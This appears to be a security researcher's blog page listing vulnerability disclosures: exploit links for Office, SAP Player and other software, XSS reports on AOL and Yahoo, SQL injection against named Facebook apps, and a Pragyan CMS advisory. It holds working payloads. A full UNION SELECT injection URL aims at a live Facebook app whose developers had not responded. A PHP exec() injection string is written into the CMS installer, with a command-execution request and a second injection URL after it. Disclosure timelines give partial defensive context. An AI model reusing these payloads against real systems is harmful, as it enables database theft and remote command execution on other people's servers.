CVE-2014-6352 OLE Remote Code Execution Vulnerability

Here is working exploit POC for CVE-2014-6352 OLE Remote Code Execution Vulnerability. Available through our exploit subscription and binary analysis program.

MS Word RTFPfragments exploit for office 2008 OSX

Please download the code from

http://www.exploit-db.com/exploits/18749

http://www.1337day.com/exploits/18068

AOL search XSS

XSS vulnerability in AOL search. We are trying to contact the AOL team. No reply from them yet.

Yahoo Cross Site Scripting Vulnerability!

There is a Cross Site Scripting Vulnerability in yahoo.com subdomain. Its in upcoming.yahoo.com . This vulnerability allows the attacker to steal cookies and perform session hijacking attacks or use XSS worms. The vendor has been notified regarding the vulnerability details.

SAP Player 0.9 (.m3u) universal

This exploit uses direct return address. Not SEH version


http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt

Another vulnerability in facebook apps!

This is second sql injection we found in facebook apps.

We tried to contact developers but got no response from them. So we decided to release the vulnerability.

Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A Proof Of Concept of the vulnerability can be seen at::

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Sql Injection in Facebook applications!

We found a vulnerability in 2 facebook applications. One is patched now so we are disclosing the vulnerability.


There was a SQL Injection vulnerability in apps.facebook.com

Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control


It was possible to extract all data of all databases located on that servers


Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure

Pragyan CMS v 3,0 mulltiple vulnerabilities!

During the Pragyan's hacking challange we found these vulnerabilities in their open source CMS.


#Pragyan CMS v 3.0 mutiple Vulnerabilities


#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,

abhilyall[at]gmail[dot]com

#Web - http://www.aslitsecurity.com/

#Blog - http://bugix-security.blogspot.com

#http://www.aslitsecurity.blogspot.com/

#Pragyan CMS v 3.0



Technical Description





1) Code execution in INSTALL/install.php

script not correctly validate entered fields.

possibility to write at password field string:



");echo exec($_GET["a"]);echo ("



or in another fields with turned of javascript.

in cms/config.inc.php will be code:

define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");

which allows command execution.



EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la



2) sql injection

- get mysql version EXPLOIT::

http://target.com/path/+view&thread_id=-1 UNION ALL SELECT

null,null,null,null,concat(unhex(Hex(cast(@@version as

char)))),null,null,null--



Solution

update to Pragyan CMS 3.0 rev.274



Changelog

2011-19-02 : Initial release

2011-20-02 : Reported to vendor

2011-25-02 : patch released

2011-25-02 : public disclose



Credits

Villy

Abhishek Lyall

pragyan.org

http://bugix-security.blogspot.com

http://www.aslitsecurity.blogspot.com/





Abhishek Lyall

Digital Music Pad v8.2.3.4.8 (.pls) SEH Overflow!

http://www.exploit-db.com/exploits/15855/

Video Workstation Version 5.3.9.4 dll hijacking (iacenc.dll, ir50_lcs.dll)!!

http://inj3ct0r.com/exploits/14314